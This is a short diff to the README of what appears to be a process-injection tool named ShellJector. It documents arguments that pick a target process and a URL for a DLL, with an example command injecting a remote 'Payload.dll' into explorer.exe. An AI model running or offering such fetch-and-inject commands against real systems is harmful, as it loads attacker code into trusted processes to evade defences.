Wolf49406/ShellJector/README.md

 ## Arguments:
 You can set `ProcName` and `DllURL` with `-proc` and `-url` arguments
-(ex: `ShellJector.exe -proc explorer.exe -url "https://example.com/library.dll"`)
+(ex: `ShellJector.exe -proc explorer.exe -url "https://example.com/Payload.dll"`)
+Arguments are case **sensitive**!

+## Notice:
+ShellJector.exe will look for Payload.dll near itself!